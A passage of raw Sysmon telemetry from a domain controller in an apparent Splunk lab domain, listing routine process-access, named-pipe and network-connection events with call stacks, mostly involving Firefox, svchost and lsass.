Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105794Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.201{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105793Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.340{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63906- 354300x8000000000000000105792Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.264{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51790-false10.0.1.12-8000- 10341000x8000000000000000105791Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.187{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4efc8|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a5b7d9|C:\Program Files\Mozilla Firefox\xul.dll+e50238|C:\Program Files\Mozilla Firefox\xul.dll+19e1f56|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+19ae344|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000105790Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:39.187{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-4C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000105789Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:39.186{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-4C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105788Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.174{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105787Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.171{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105786Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:39.171{58E9C193-B425-615A-0702-00000000FC01}5268\chrome.5552.10.182767119C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105785Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.171{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+1b80fc|C:\Program Files\Mozilla Firefox\xul.dll+a15446|C:\Program Files\Mozilla Firefox\xul.dll+a0ffef|C:\Program Files\Mozilla Firefox\xul.dll+19ce81f|C:\Program Files\Mozilla Firefox\xul.dll+19ccfc1|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000105784Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:39.171{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.10.182767119C:\Program Files\Mozilla Firefox\firefox.exe 18141800x8000000000000000105783Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:39.169{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.9.72506646C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105782Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.167{58E9C193-B422-615A-0602-00000000FC01}55524224C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+13527b|C:\Program Files\Mozilla Firefox\xul.dll+12239ed|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105781Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:39.167{58E9C193-B422-615A-0602-00000000FC01}5552\gecko-crash-server-pipe.5552C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105780Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e57449|C:\Program Files\Mozilla Firefox\xul.dll+e49022|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105779Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105778Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105777Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105776Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105775Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105774Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105773Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105772Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105771Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.092{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105770Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.091{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105769Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.091{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program 